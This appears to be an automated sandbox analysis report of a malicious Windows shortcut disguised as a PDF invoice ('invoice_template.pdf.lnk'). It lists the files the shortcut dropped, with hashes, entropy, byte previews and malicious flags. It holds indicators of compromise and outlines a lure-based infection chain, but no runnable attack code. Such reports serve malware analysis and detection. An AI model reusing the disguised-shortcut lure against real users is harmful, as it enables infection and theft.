                                                                                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):98304
                                                                                                                                                              Entropy (8bit):0.08231524779339361
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                              MD5:886A5F9308577FDF19279AA582D0024D
                                                                                                                                                              SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                                                                                                                                              SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                                                                                                                                              SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):32768
                                                                                                                                                              Entropy (8bit):0.017262956703125623
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 4, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):49152
                                                                                                                                                              Entropy (8bit):0.86528072116055
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:kTN7KLWlGxdKmtZeympbn8MouB6w9f/rrGMa:qVlGxdKN7Iw9fj
                                                                                                                                                              MD5:8CC409C8658C3F05143C1484A1719879
                                                                                                                                                              SHA1:909CDE14664C0E5F943764895E0A9DFEC7831FF5
                                                                                                                                                              SHA-256:BC69C3518DA2ABC8904F314F078D9672BAF3B840E09FD2B2E95D4B07A03A85A4
                                                                                                                                                              SHA-512:55D8923B6481ADF442817B7BAA50C36CBAD8DAC0EC600451813D29F4775DE519A06158A6233E61635CD0ED862E60AC7F50C75556C4E89D583D8A8A4299F1808F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3045002, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):1.4026573159402624
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:TB9aw/aHLopFMavU1/iB8eVC+rQ88TkQqp8JHyDlEKw0esEieNp:1PareMa8K8eVC+rZ8TkQqpWSDlNufp
                                                                                                                                                              MD5:F49DFF163167A43F4940B7337A092C07
                                                                                                                                                              SHA1:1A8BAAC92537FA0BD39063D17C3072AD86190CC4
                                                                                                                                                              SHA-256:B3D38278030DBEA9D1CDDC177F9B6CB590CE1D383A88211B231402B7CA208CF3
                                                                                                                                                              SHA-512:BC7685763D70300FE2AE28803D9F886D91004F6045A995065FAAEB6A9DFCAB77E80B475516E9B4C1F8969E112E2B48C7E68FC2AB15F61BB69443A8C54E24066F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................v.......@..g.....@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):135168
                                                                                                                                                              Entropy (8bit):1.0873605234887023
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                                                                                                                                              MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                                                                                                                                              SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                                                                                                                                              SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                                                                                                                                              SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):57344
                                                                                                                                                              Entropy (8bit):0.7310370201569906
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
                                                                                                                                                              MD5:A802F475CA2D00B16F45FEA728F2247C
                                                                                                                                                              SHA1:AF57C02DA108CFA0D7323252126CC87D7B608786
                                                                                                                                                              SHA-256:156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
                                                                                                                                                              SHA-512:275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x9, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):28672
                                                                                                                                                              Entropy (8bit):1.5161495002712742
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:s3n5HGsht8kAM0hsYfxqYgXZBqIcsrl3tuY2sWsqF:c5mF5wnpx9uYSF
                                                                                                                                                              MD5:16A6EDF5F48F2A7B20B3B8825384B05C
                                                                                                                                                              SHA1:A59542299A41166F515B18AB8CBC3D72517ED207
                                                                                                                                                              SHA-256:3E1A2BB358B396C201A6058EC8A05E25B167255EB3DAEEB1130331A298CC6F93
                                                                                                                                                              SHA-512:7C4C9D69B05EA5B120C0DB6DF7D0C4487387659AF6D17C387503CA360EF8430F676B0964B6BC3C368BA4DC8D0E648B2750C26970D833788982BBF5BC04AC632D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................S`..=......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):122880
                                                                                                                                                              Entropy (8bit):1.1414673161713362
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                                                                                                              MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                                                                                                              SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                                                                                                              SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                                                                                                              SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\winpdf.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):879817
                                                                                                                                                              Entropy (8bit):6.620408308553608
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:U0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:Uxz1JMyyzlohMf1tN70aw8501
                                                                                                                                                              MD5:76B24CEC0ECC596A28D19EFEEE2D3A81
                                                                                                                                                              SHA1:BADF2A671B803E51FB832ED7D1043AFE5FE86DF8
                                                                                                                                                              SHA-256:749D5E310080E8A7017EB0A63E849B15D17652D19F6D462E296FBAE85F823DC9
                                                                                                                                                              SHA-512:74D330C1F69CE3603E15DF21982A11ED4C3895FCE9DDBB4A74C70D1A1378801AA6CFAB85047E818E1C9B538DD114B7D926BB892E9758EFA9938C8EF4A5A1903D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:..6.u...YV.n...Y..^.........U..E...u.........]...x...;........D....3............U..SV.u.W...................]..u.....F....;.}..W....._.........;.......M...3..~0..........$..............;......."...A...;.|.W.3..~H......d$..........E..8....uE....h............E....9........Nu.........G..<..tM.E....A...._^[].}....?.}.....].........n.......V....8.....................j............t_j..z........tMh..I........F..F......E._...I..4...^.A....[].=....t.H....S..............s...3..3...3..D....U..QSV.u.W...............8....t........M...t6...........~(.U...>.R.........@}..................Iu...Y...............;...........3..~)........8........0;......u.......B...;.|.3.U...~L......E.........E..8....u{.A. ............E..U.........E.....U..E.Ou...xc.A.............uHj.............t4.u....G......W......@..<....A...._^[..]..]...;...3....u........3.....U..V.u...W......}...t#...........~.S.]..s..[.......Ou.[..3................@.......9.....~4.......................A..A....y......TG..
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\winpdf.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):65536
                                                                                                                                                              Entropy (8bit):7.997155751340491
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:1536:DjsFpZ5F0YlkmscxwJ/Mlfva7zBZsVamDFn8bG5cxux4wNE3l+wG:XsXfF0YWmxoKn8BCImD6oqZwS3jG
                                                                                                                                                              MD5:DD8C684C11A5F9CE808BF333D5FE3FBD
                                                                                                                                                              SHA1:21151191405148269A85595575CB5A8904EFF78D
                                                                                                                                                              SHA-256:0C30812E4A9185C9BA90C768205250EFB722F47CF6E8066DF2B278C12158F999
                                                                                                                                                              SHA-512:0D8BFF284F71DED607EA6CA8BD243728BB152C5AA436644909006D0987101F1528A8D5E728A06DFB21F042CDB67336B1B4C33DE3CB0699E2A82FAA32E383935F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:S|..K.#Q.....K..xv.*!.iC.......x.I.!>...........Q..1.d;k..9...)lM...W8.24=NE.t_.....r..a.H.P.....#.....P.........>..E;...As..qO...#.E;uktk,.........^...(c...T.:.....Z.pe...u)0`T...j.]=..d.)\. ....,..J.u.....2...7..&......G.9.2.>#3.2.?.'.{.`f.w...>!.h...U...K.Q$..}..di...,Y..e.p...ax..7n|..._D;.......F.X<8. ^..^\.GT.H..\>..O....8....V.5..f....x]M*.$0i].'..\.FB&<..5x..1...y.,.v.....I...L.<.G........j......P..\r.A.Kt...X......_..,0.g....9.V...Nj.|..-..0....z....HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Ma......m@nD<....d....s..........x.C\X...........J...+....^.w.5............?r.Q..m;.....w.....;.&.......2..g2"~?]...'kO...p...G................/..B.p../..B.p.kC.R......%x....}...q..U-...(....%....V..?p.he....,.. .o.UA..1.An....H.`>$O.ng.)........s+V.p...'|.G...!.$..n.K...;E..<J.W.C3.lY....A8>..>..1...32...T8}..,...E.....[S..i=.#\In>3(..?.......n..=.../..g.i../..B.p.m........x.5...x..2(.U.j...."b4r
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\winpdf.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):13814
                                                                                                                                                              Entropy (8bit):6.438649640984983
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:7HAHhww+/2nlP3r1WAL3yQZRMdTQmYwim12sBkJ:7gH7ACViIeTxYEhqJ
                                                                                                                                                              MD5:8FA72B5722AABD405A1E3C75D05665FE
                                                                                                                                                              SHA1:59BEBCC712B9272C4225B9CF5A067C5CE197DA09
                                                                                                                                                              SHA-256:C7861E30724EA53BB0026274F6DCF09E5507B727E5FCA0F7E8F07DB13BC2138A
                                                                                                                                                              SHA-512:DA5B678EF738F8D0CAC5D3DD769AB2C077BCD5D04380A3D994A900B9C092FB830BBFFA89EEC631C47B17467F1CE4F087A7E51F79EB17851AB68095524525D671
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:HOWCONCERNEDPAMMURDER..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.........................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\winpdf.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):17151
                                                                                                                                                              Entropy (8bit):7.989047654452686
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:ZqEqDYherWjPiysDAhlJ1155ZfCGZBb4dr6Ka1/LBDpG:Z3XcWbi6hlJ/5bfF4h6KOppG
                                                                                                                                                              MD5:25DD6C97FEE18CED4EE9E63815F0C05E
                                                                                                                                                              SHA1:F9520AE30D2C2E03977AFE2D372AFD93F9710C83
                                                                                                                                                              SHA-256:BFB3746238481A7DB0374CB44AE7720C8F14F56FA0B817CDCCC029C581E9EDE7
                                                                                                                                                              SHA-512:0B1EFDB6D41B705CF3D4B1A68DDFCFFD2D81D1EC656991DA0075CD28D33DA690253E5F6233545B2FA575D2D726311E723303C942A76E6DF3F888A38DFE19160A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:-..z-g....t.h.g_...yP-._...?......*|...h....ET-.r.k......*,....4..0.......a.........3\........b ......z..,5Bm.h..CQ.E..........5X+....0.......}g]...............7...SFw...#..iq...RBU.....y.[Eob...x..}I....Mg.a.5...z.&...&%....5.=.@..DP....G.{..T.U.e2..A...CDG...Dj.;*..Xn.....Z.G.I\bY.N.....hyj....l)1t.i...rb....z.....8"...2..@'....<^.u.4..o....$T.].P....f....6...0..[2;../.g.2....e..cI..+........8..!...l.p.;...............l52.-(.......^F..#t....COVkP...n.r..W.M......H..N.D./z...C5....K.N..8....i...<..kh...3..r0..s..9[.P......Q...o...4..`....8C.0.c6..q8.....>b.... N......aA........u....n$....6.4L@f+.F..$Q..:g...N..I}3.lL...u...t..e.<...5.+.".?j.......*..[`u.x..c..W>.+.!Q..7....e-.'d...Hx.VX...$;.W..;.`.g.p....N.U8.g.a....a........9.....k!.ja...d.].....W.7.(.."...w.....j.....-!..UW........=Op.l.Z........3 ......v...X....<....g]V...k"..>.......R.N.j. .^.F.l.@.L+...G)'...f.`...0}...j.......Fm......eO/h..X.@...x.m,.U...:.Wt.......
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1048590
                                                                                                                                                              Entropy (8bit):7.6994156341461935
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:hCHO3niNmMY0Q2LEYW2Wxo92GDCbZexn7Lel8yTCVHKSNTgqjJ9I6xl4rGlr3t:hOO34mt0QRYHWm9XDIZY7o8SCVmM951b
                                                                                                                                                              MD5:80FDAC591563D6CE2CAC6B0D254B8AC7
                                                                                                                                                              SHA1:88CB6DDACCE5BE1342F3B51D240149E8196C347B
                                                                                                                                                              SHA-256:478403B8F4924B2698725A1ED3EF6B5A5C9C4D603C7DE96D53C615C7DBBE9CE5
                                                                                                                                                              SHA-512:0BC364F85F7EDFD84C07A3AF04622EFEC94BED3884945727E7528A31999DEBF098A83871A830F40D928DB6ACFC0A7347E61A40958DD7BB72165E51CE9C7D1758
                                                                                                                                                              Malicious:true
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@..........................p......k.....@.................................4........@..............s#..@.......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2....`......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):5367
                                                                                                                                                              Entropy (8bit):3.430287174767667
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:WAW0vEmH+fMIaODnvu+4zxl43SogZo7gGvjnvu+4zxl43SogZo7gGDA:WAxEa+kOnG+4zsiHxGrnG+4zsiHxGE
                                                                                                                                                              MD5:9FF257F89437FB5C72C83BB9D94E4500
                                                                                                                                                              SHA1:4CAF9F5554C0C8D5170DCCD99AD01B78F72EA88C
                                                                                                                                                              SHA-256:B225D69ABEFE9AAD339EEB698967CEEB31EEDC07EFA9E75C105D289C018B4E6D
                                                                                                                                                              SHA-512:084EED9F128B283A5191F87E6FF1256EAC684D40CF733D63726D352B900AAE317656E387A05EC3F1B52D21EC5D66C7906503967501A0B3FB7F2B7B0A3529ABFE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:...................................FL..................F.`.. ... ....0..1Br{i0.....{i0...f..8........................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._...x.1..0..Z.t{i0....~.2..f..fY.. .INVOIC~1.LNK..b......fY.LfY......e.........................i.n.v.o.i.c.e._.t.e.m.p.l.a.t.e...p.d.f...l.n.k......._...............-.......^...................C:\Users\user\Desktop\invoice_template.pdf.lnk....C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\System32\shell32.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l............................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):5367
                                                                                                                                                              Entropy (8bit):3.430287174767667
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:WAW0vEmH+fMIaODnvu+4zxl43SogZo7gGvjnvu+4zxl43SogZo7gGDA:WAxEa+kOnG+4zsiHxGrnG+4zsiHxGE
                                                                                                                                                              MD5:9FF257F89437FB5C72C83BB9D94E4500
                                                                                                                                                              SHA1:4CAF9F5554C0C8D5170DCCD99AD01B78F72EA88C
                                                                                                                                                              SHA-256:B225D69ABEFE9AAD339EEB698967CEEB31EEDC07EFA9E75C105D289C018B4E6D
                                                                                                                                                              SHA-512:084EED9F128B283A5191F87E6FF1256EAC684D40CF733D63726D352B900AAE317656E387A05EC3F1B52D21EC5D66C7906503967501A0B3FB7F2B7B0A3529ABFE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:...................................FL..................F.`.. ... ....0..1Br{i0.....{i0...f..8........................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._...x.1..0..Z.t{i0....~.2..f..fY.. .INVOIC~1.LNK..b......fY.LfY......e.........................i.n.v.o.i.c.e._.t.e.m.p.l.a.t.e...p.d.f...l.n.k......._...............-.......^...................C:\Users\user\Desktop\invoice_template.pdf.lnk....C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\System32\shell32.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l............................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\explorer.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):893608
                                                                                                                                                              Entropy (8bit):6.62028134425878
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                                                                              MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                              SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                                                                              SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                                                                              SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\explorer.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):365216
                                                                                                                                                              Entropy (8bit):7.999511323195255
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:6144:8PYkEET7ibFvFUO6JPrsqZnCiz80WOCPmRO3cCP05iG+AiczHu6t8g+HnQmRcz:4YkEEmmPIqZH9gmqH2i92Hu6urwV
                                                                                                                                                              MD5:44C90330F9988E239C590C1A978076D8
                                                                                                                                                              SHA1:B622B90E1F74FE9D3075F65E1DC14339FBDE828B
                                                                                                                                                              SHA-256:B04504700F0A5D27F0D453AA17B4FD2D5AE67B8F6EF66104723FE75D2EF5780E
                                                                                                                                                              SHA-512:F1EC45C924AB8F69AEA05ED4898DD1345BBF4786DC747A6C8DDDB68EC750DBDB6C6A82ABBEDA7F8A2830CCDFCF65D55B6485DC14D0DE05AECE41645EA3F0F6D1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:..$l....1.....0S..r.I...y..=...S.Z.BU|...h..Uq.+....zCP..G.|^G....!...\.Zi.?.!...}n.....QGu.z.j.6Z...w.>Uf.........y.e...6.(...G.!...w$Z..:.....m.*6..n..~....v..G.n....6U^....O.H........v..5-.Ac\.E.r_.,.(g8RK6.p..FB...q....u.C.FwBa6.'e.^..o....R~h.7...,UEi4..TW.#:..'w\wz."..$S~..z.....tK4.>...Ul.u.*....e.z...t-9..~.. }.....L^..s.......my,{....X.F.....L.*".p#.G....W.;....5.w.g..-1RV..c...yT.|.g...<.>.V6 <.V.i.Ol,...Q.....K=..N1..........m.R...f.L`<5..Oh.i8.A.e.v.L._..(...}...D.k......~.A.~L]d.=...k...J..s#.__...}EV.C...Wx.......>....3Q@.....8z..l.....`.N..t...h,a.B.....N......o_..=.W8F5.\.jE@&a.Q.!.N..c....i.r......7..>.z>P....v....A`.g..m......{%.wPP...C.l.?....0Ni...*.X...~#.&.\.3VD.E:....r..z....;....[.&........|.......qc.p&...G.8....co%..N.K.G=.M..3.....7zRo:.....][...S..=............Q...<=....$.O....P..h*%.4.z.%.I.q.._.#...f..p.F......K{...R..r...ts.].u^...{v..O.....a.....O.\..R...y5..0..Q.{...8...cM.h..~~:.....M&.......>t...8..J
                                                                                                                                                              File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=312, Archive, ctime=Tue Feb 13 22:20:31 2024, mtime=Tue Apr 2 15:48:58 2024, atime=Tue Feb 13 22:20:31 2024, length=455680, window=hidenormalshowminimized
                                                                                                                                                              Entropy (8bit):5.975445873380218
                                                                                                                                                              TrID:
                                                                                                                                                              • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                              File name:invoice_template.pdf.lnk
                                                                                                                                                              File size:1'402'376 bytes
                                                                                                                                                              MD5:9843c5bbba28871898a11724713926a7
                                                                                                                                                              SHA1:28a28d00c8d8a6e284e679cbc94fc586b32650e8
                                                                                                                                                              SHA256:1fe661a6f1371bfd4b4c2fdc0e835f8ca8bbdc2d25b00b5b89846fc4cdeea2f1
                                                                                                                                                              SHA512:7f2b77ab729c979c2421890d8f80fae7c308d2a3d7f4d3c557373b182311992ef9a2974fd5826d9b57956776a73a70236a0c551161edb315575b51537ef4e936
                                                                                                                                                              SSDEEP:24576:TAKPJ5wgA31fynHyzeHW5bdYUqM3656dyBoNMul63RPSl:8kvAlfAHyV36gdAobl
                                                                                                                                                              TLSH:2F557EFA074BCD8996B41EF740827A272E34B4570467A6E7E0D75ED7A008FF10E29CA5
